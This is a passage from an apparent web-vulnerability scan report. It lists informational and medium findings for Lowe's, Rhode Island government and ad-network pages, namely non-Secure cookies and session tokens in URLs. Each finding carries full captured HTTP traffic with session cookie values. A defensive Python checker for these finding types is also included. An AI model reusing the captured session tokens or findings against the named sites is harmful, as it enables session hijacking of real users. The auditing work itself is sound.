Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmTPSet=Y; MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TseYfU77Cle%2fm%0ab0yPR1ZdZKqdzv4K90EN5LABrTDJqw%2bv3BQL%2fdgBlrAW4pfUJIrUfYSaLoZuCgSo0qJaRQKNfA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2896981527%3atrue%3afalse%3a0%3aWsNL%2fRHH6YRulRJGHQvbU%2bbK20A%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; catSearchResult=|/pl_Flooring_4294934373_4294937087_; TSdcd8fd=42184ef523475358e3f266b98a3eff98b936a614cb0d4b614e1cbbd2; cmSessionDepth=4; lowes-prefs={"zipin":{"show":false},"tollfree":{"show":true}}; 
fsr.s={"v":1,"rid":"1310506289401_163212","ru":"http://www.lowes.com/?mastheadURL=TopCategoriesDisplayView&firstReferURL=http%3A%2F%2Fwww.lowes.com%2F&qvRedirect=&langId=-1&findStoreErrorURL=StoreLocatorDisplayView&catalogId=10051&masthead=true&zipCode=10010&Ntt=&NttParam=&storeId=10151&selectedLocalStoreBeanArray=%5Bcom.lowes.commerce.storelocator.beans.LocatorStoreBean%404e575949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e75d949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e955949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d749949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d941949%5D&URL=TopCategoriesDisplayView&y=0&isQvSearch=&x=0","r":"www.lowes.com","st":"","to":3,"c":"https://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; JSESSIONID=0000bJcLADoQIGfUv01WZVkpsK7:14e1grfqa; BIGipServerproduction-asm-onlineA.lowes.com-tcp443=217583788.47873.0000; TS176ebc=5d8c447446fc2b8f4f060fa877256f5d55d9cb443b13e8794e1ce39e; stop_mobi=yes

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 11 Nov 2010 21:24:51 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 11
Expires: Wed, 13 Jul 2011 00:22:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 13 Jul 2011 00:22:35 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: akaau=1310518355~id=24041af9526315cfad1662ac5edcd35c; path=/

/* empty */

7.112. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/niftycube.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.lowes.com
Path:   /wcsstore/B2BDirectStorefrontAssetStore/javascript/niftycube.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

akaau

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/javascript/niftycube.js HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
Referer: https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpBTiHMF%2BPtrjg%2F5ZFfDHXjuTogRqSuGR4efV6fa7g5SaSXQQW3naq2iX%0AFpd3O3L2OA%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmTPSet=Y; MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TseYfU77Cle%2fm%0ab0yPR1ZdZKqdzv4K90EN5LABrTDJqw%2bv3BQL%2fdgBlrAW4pfUJIrUfYSaLoZuCgSo0qJaRQKNfA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2896981527%3atrue%3afalse%3a0%3aWsNL%2fRHH6YRulRJGHQvbU%2bbK20A%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; catSearchResult=|/pl_Flooring_4294934373_4294937087_; TSdcd8fd=42184ef523475358e3f266b98a3eff98b936a614cb0d4b614e1cbbd2; cmSessionDepth=4; lowes-prefs={"zipin":{"show":false},"tollfree":{"show":true}}; 
fsr.s={"v":1,"rid":"1310506289401_163212","ru":"http://www.lowes.com/?mastheadURL=TopCategoriesDisplayView&firstReferURL=http%3A%2F%2Fwww.lowes.com%2F&qvRedirect=&langId=-1&findStoreErrorURL=StoreLocatorDisplayView&catalogId=10051&masthead=true&zipCode=10010&Ntt=&NttParam=&storeId=10151&selectedLocalStoreBeanArray=%5Bcom.lowes.commerce.storelocator.beans.LocatorStoreBean%404e575949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e75d949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e955949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d749949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d941949%5D&URL=TopCategoriesDisplayView&y=0&isQvSearch=&x=0","r":"www.lowes.com","st":"","to":3,"c":"https://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; JSESSIONID=0000bJcLADoQIGfUv01WZVkpsK7:14e1grfqa; BIGipServerproduction-asm-onlineA.lowes.com-tcp443=217583788.47873.0000; TS176ebc=5d8c447446fc2b8f4f060fa877256f5d55d9cb443b13e8794e1ce39e; stop_mobi=yes

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Tue, 28 Apr 2009 19:56:32 GMT
ETag: "1f8e59-22f6-dc02bc00"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 8950
Expires: Wed, 13 Jul 2011 00:22:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 13 Jul 2011 00:22:35 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: akaau=1310518355~id=24041af9526315cfad1662ac5edcd35c; path=/

/* Nifty Corners Cube - rounded corners with CSS and Javascript
Copyright 2006 Alessandro Fulciniti (a.fulciniti@html.it)

This program is free software; you can redistribute it and/or modify
it u
...[SNIP]...

7.113. https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.lowes.com
Path:   /webapp/wcs/stores/servlet/LogonForm

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

stop_mobi
TS176ebc

The cookies do not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function. Note that without the Secure attribute a browser also sends these cookies on any plain-HTTP request to the same host, so their values are exposed to anyone who can observe or induce such a request, even though the login form itself is served over HTTPS.

Request

GET /webapp/wcs/stores/servlet/LogonForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpBTiHMF%2BPtrjg%2F5ZFfDHXjuTogRqSuGR4efV6fa7g5SaSXQQW3naq2iX%0AFpd3O3L2OA%3D%3D HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmTPSet=Y; MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; akaau=1310508051~id=2a2d7c73e86ffa9af674df8410f6edd7; JSESSIONID=0000PEQyadqdrfGWIRAteqY0oby:14e1grfqa; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TseYfU77Cle%2fm%0ab0yPR1ZdZKqdzv4K90EN5LABrTDJqw%2bv3BQL%2fdgBlrAW4pfUJIrUfYSaLoZuCgSo0qJaRQKNfA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2896981527%3atrue%3afalse%3a0%3aWsNL%2fRHH6YRulRJGHQvbU%2bbK20A%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; catSearchResult=|/pl_Flooring_4294934373_4294937087_; TSdcd8fd=42184ef523475358e3f266b98a3eff98b936a614cb0d4b614e1cbbd2; cmSessionDepth=4; lowes-prefs={"zipin":{"show":false},"tollfree":{"show":true}}; 
fsr.s={"v":1,"rid":"1310506289401_163212","ru":"http://www.lowes.com/?mastheadURL=TopCategoriesDisplayView&firstReferURL=http%3A%2F%2Fwww.lowes.com%2F&qvRedirect=&langId=-1&findStoreErrorURL=StoreLocatorDisplayView&catalogId=10051&masthead=true&zipCode=10010&Ntt=&NttParam=&storeId=10151&selectedLocalStoreBeanArray=%5Bcom.lowes.commerce.storelocator.beans.LocatorStoreBean%404e575949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e75d949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e955949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d749949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d941949%5D&URL=TopCategoriesDisplayView&y=0&isQvSearch=&x=0","r":"www.lowes.com","st":"","to":3,"c":"https://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; TS176ebc=1a0f9fe32c557afd221d80acddaf468367f2f8b0aad7ead04e1cbb8c

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-store, no-cache
Expires: now
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 63497
Date: Wed, 13 Jul 2011 00:22:35 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: stop_mobi=yes; path=/; domain=.lowes.com; expires=Wed, 13-Jul-2011 00:52:35 GMT
Set-Cookie: TS176ebc=8af291dbf163c57592847d6d73d5eb85d172642e494065004e1ce3f1; Path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

...[SNIP]...

7.114. https://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.lowes.com
Path:   /webapp/wcs/stores/servlet/UserRegistrationForm

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

stop_mobi
TS176ebc

The cookies do not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/UserRegistrationForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpL0emnRAXCBEyb1P3TIgvN33O5bKg83oIP9HgETjY0njRr0u8xYTB20%3D HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmTPSet=Y; MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; akaau=1310508051~id=2a2d7c73e86ffa9af674df8410f6edd7; JSESSIONID=0000PEQyadqdrfGWIRAteqY0oby:14e1grfqa; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TseYfU77Cle%2fm%0ab0yPR1ZdZKqdzv4K90EN5LABrTDJqw%2bv3BQL%2fdgBlrAW4pfUJIrUfYSaLoZuCgSo0qJaRQKNfA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2896981527%3atrue%3afalse%3a0%3aWsNL%2fRHH6YRulRJGHQvbU%2bbK20A%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; cmSessionDepth=2; lowes-prefs={"zipin":{"show":false}}; stop_mobi=yes; TSdcd8fd=9bfed736835c96972761a89519e0d94422df7bb2eaf0e7a04e1cbbb4

Response

HTTP/1.1 200 OK
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html; charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Date: Tue, 12 Jul 2011 21:31:37 GMT
Content-Length: 68157
Connection: keep-alive
Set-Cookie: stop_mobi=yes; path=/; domain=.lowes.com; expires=Tue, 12-Jul-2011 22:01:37 GMT
Set-Cookie: TS176ebc=3557926829ef74993d5214d92b1ba1ff3ddff0b185006e134e1cbb8e; Path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<meta chars
...[SNIP]...

7.115. https://www.ri.gov/Licensing/renewal/license.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ri.gov
Path:   /Licensing/renewal/license.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

27c333941c8c80ef374fc9b4c26a2b6c

The scanner reports that the cookie does not appear to contain a session token, but that heuristic should not be relied on here: the cookie name is a 32-character hex string and the value is 26 characters drawn from 0-9 and a-v, which is the format PHP generates for session identifiers, so this cookie should be treated as a session token and reviewed accordingly.

Request

GET /Licensing/renewal/license.php HTTP/1.1
Host: www.ri.gov
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=53040939.1400319473.1310517107.1310517107.1310517107.1; __utmb=53040939.7.10.1310517107; __utmc=53040939; __utmz=53040939.1310517107.1.1.utmcsr=riema.ri.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; font_level=0

Response

HTTP/1.1 302 Found
Date: Wed, 13 Jul 2011 00:33:56 GMT
Server: www
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Wed, 13 Jul 2011 00:33:56 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 27c333941c8c80ef374fc9b4c26a2b6c=pdsbkbuon9vkibc63q4ad7ar52; path=/
Location: /Licensing/
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1


8. Session token in URL
There are 10 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
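A small offline checker for the two finding classes in this report, the 7.x cookies set without the Secure attribute and the 8.x session tokens carried in URLs, as an added example that is not part of the scanner output. It parses a raw HTTP response, lists cookies set without Secure on an HTTPS origin, and looks for session identifiers both as ;name=value path parameters (the servlet URL-rewriting form seen on locator.chase.com) and in query strings, while skipping short labels such as token=LOW21. The two sample responses are constructed to mirror entries 7.110 and 8.5; the session-name list and the opaque-value heuristic are the editor's assumptions, not a standard.

```python
"""Offline checker for the two finding classes in this report: Set-Cookie
without the Secure attribute on an HTTPS origin (7.x) and session identifiers
carried in URLs as ;jsessionid= path parameters or query parameters (8.x).
Editor-added example; the sample responses below are constructed, not captured."""
import re
from urllib.parse import urlsplit, parse_qsl

# Names that are session identifiers by convention (assumption: illustrative list).
SESSION_NAMES = {"jsessionid", "phpsessid", "asp.net_sessionid", "sessionid", "session_id"}
# Weaker signal: the name hints at a session/token AND the value looks opaque.
# Short labels such as token=LOW21 fail the length test (the 8.1/8.3 false positive).
HINT_RE = re.compile(r"sess|token", re.I)
OPAQUE_RE = re.compile(r"^[A-Za-z0-9+/=_.~-]{16,}$")
URL_ATTR_RE = re.compile(r"""(?:href|src)\s*=\s*["']([^"']+)["']""", re.I)

def parse_response(raw):
    """Split a raw HTTP response into (status_line, [(name, value)], body)."""
    sep = "\r\n\r\n" if "\r\n\r\n" in raw else "\n\n"
    head, _, body = raw.partition(sep)
    lines = head.splitlines()
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers, body

def insecure_cookies(headers, over_https):
    """Cookie names set without Secure. Only meaningful on an HTTPS origin,
    where such a cookie is also sent on any plain-HTTP request to the host."""
    if not over_https:
        return []
    names = []
    for name, value in headers:
        if name != "set-cookie":
            continue
        parts = [p.strip() for p in value.split(";")]
        attrs = {p.split("=", 1)[0].lower() for p in parts[1:]}
        if "secure" not in attrs:
            names.append(parts[0].split("=", 1)[0])
    return names

def classify(name, value):
    """'session' for a known session parameter, 'likely' for a hinted name
    with an opaque value, None otherwise."""
    lname = name.lower()
    if lname in SESSION_NAMES:
        return "session"
    if HINT_RE.search(lname) and OPAQUE_RE.match(value):
        return "likely"
    return None

def session_tokens_in_url(url):
    """(location, name, value, verdict) for session-like tokens in a URL:
    ;name=value path parameters (servlet URL rewriting) and the query string.
    urlsplit keeps ;params inside .path, which is what we need here."""
    found = []
    parts = urlsplit(url)
    for m in re.finditer(r";([^;/?#=]+)=([^;/?#]*)", parts.path):
        verdict = classify(m.group(1), m.group(2))
        if verdict:
            found.append(("path", m.group(1), m.group(2), verdict))
    for key, val in parse_qsl(parts.query, keep_blank_values=True):
        verdict = classify(key, val)
        if verdict:
            found.append(("query", key, val, verdict))
    return found

def session_tokens_in_html(body):
    """Scan href/src attribute values in an HTML body."""
    found = []
    for url in URL_ATTR_RE.findall(body):
        found.extend(session_tokens_in_url(url))
    return found

def check_response(url, raw):
    """Run both checks on one request URL / raw response pair."""
    _, headers, body = parse_response(raw)
    return {
        "insecure_cookies": insecure_cookies(headers, urlsplit(url).scheme == "https"),
        "tokens_in_request_url": session_tokens_in_url(url),
        "tokens_in_links": session_tokens_in_html(body),
    }

# Constructed samples modelled on entries 7.110 and 8.5 of this report.
ASSET_URL = "https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo.js"
ASSET_RESPONSE = (
    "HTTP/1.1 200 OK\r\nContent-Type: application/x-javascript\r\n"
    "Set-Cookie: akaau=1310518355~id=24041af9526315cfad1662ac5edcd35c; path=/\r\n"
    "\r\n/* compiled dojo */"
)
LOCATOR_URL = "https://locator.chase.com/"
LOCATOR_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Set-Cookie: JSESSIONID=D0ADAAE16A951A07FE1EEAE985EA56B3.ftc-web2; Path=/; Secure\r\n"
    "Content-Type: text/html;charset=UTF-8\r\n\r\n"
    '<a href="https://www.chase.com"><img src="/images/logo107x20.gif;jsessionid='
    'D0ADAAE16A951A07FE1EEAE985EA56B3.ftc-web2" /></a>'
)

if __name__ == "__main__":
    for url, raw in ((ASSET_URL, ASSET_RESPONSE), (LOCATOR_URL, LOCATOR_RESPONSE)):
        print(url, check_response(url, raw))
```

Run as-is it prints the findings for the two constructed samples: akaau flagged as a non-Secure cookie on the asset response, and the jsessionid path parameter flagged in the locator page's image link even though the cookie itself was set with Secure. Feed it a proxy capture (request URL plus raw response) to reproduce the 7.x and 8.x checks without the scanner's false positive on token=LOW21.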


8.1. http://bh.contextweb.com/bh/set.aspx

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The URL in the request appears to contain a session token within the query string:

token=LOW21

Note that the value is a five-character label, and the response stores the same value in the cwbh1 cookie next to the advid 2996 (see the Set-Cookie header below), which points to an advertiser or campaign tag rather than a per-user session token; this instance is most likely a false positive.

Request

GET /bh/set.aspx?action=add&advid=2996&token=LOW21 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1160694;type=lowes714;cat=homep272;ord=1;num=7992032719776.034?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cr=355|1|-8588954932899850418|1%0a96|1|-8588950208424621064|1; C2W4=34DkJByS2sgGWcSZSsuSIpNMUY7ymKD5ZXzIovVtgKtwiicRQyPWQvA; FC1-WC=^56837_1_39y0y; cwbh1=1914%3B07%2F02%2F2011%3BHWHS1%0A357%3B07%2F17%2F2011%3BEMON1%3B07%2F24%2F2011%3BEHEX1%0A2866%3B07%2F06%2F2011%3BSHME2%0A1443%3B07%2F26%2F2011%3BNETM7; V=8vciuQJMXXJY; pb_rtb_ev=1:535039.ea5c094a-3a81-4d54-b8e2-975f65fd39a9.0|534889.csmq4atf04cxa.0|531292.AG-00000001389358554.0|534301.d7aeb157-aa7f-4dc8-ba2f-15ae36a8c609.0|530739.4dd07bc8-e97b-118c-3dec-7b8c5c306530.0|530912.WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP.0|530734.1461734246\B1305465412\B8\B2.0|537085.E3F32BD05A8DDF4D5646D79640088B.0|531399.1voofy6a0tk1w.0|535495.9ed3f2f2-7f5a-11e0-a07a-00259009a9e4.0|536088.2814750682866683.0|535461.4325897289836481830.0|538303.x.0

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
CW-Server: cw-web81
Set-Cookie: V=8vciuQJMXXJY; Domain=.contextweb.com; Expires=Fri, 06-Jul-2012 21:30:51 GMT; Path=/
Set-Cookie: cwbh1=357%3B07%2F17%2F2011%3BEMON1%3B07%2F24%2F2011%3BEHEX1%0A1443%3B07%2F26%2F2011%3BNETM7%0A2996%3B08%2F11%2F2011%3BLOW21; Domain=.contextweb.com; Expires=Wed, 15-Jun-2016 21:30:51 GMT; Path=/
Content-Type: image/gif
Date: Tue, 12 Jul 2011 21:30:51 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

8.2. http://blog.katango.com/2011/07/05/how-facebook-affects-your-relationships-infographic/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://blog.katango.com
Path:   /2011/07/05/how-facebook-affects-your-relationships-infographic/

Issue detail

The response contains the following links that appear to contain session tokens:

http://blog.katango.com/2011/07/05/how-facebook-affects-your-relationships-infographic/?like=1&_wpnonce=e687d1efc9

Note that _wpnonce is a WordPress nonce, an action-specific anti-CSRF value with a limited lifetime, not a session identifier; its presence in the link is by design, and disclosure of it does not grant access to the user's session.

Request

GET /2011/07/05/how-facebook-affects-your-relationships-infographic/ HTTP/1.1
Host: blog.katango.com
Proxy-Connection: keep-alive
Referer: http://blog.katango.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
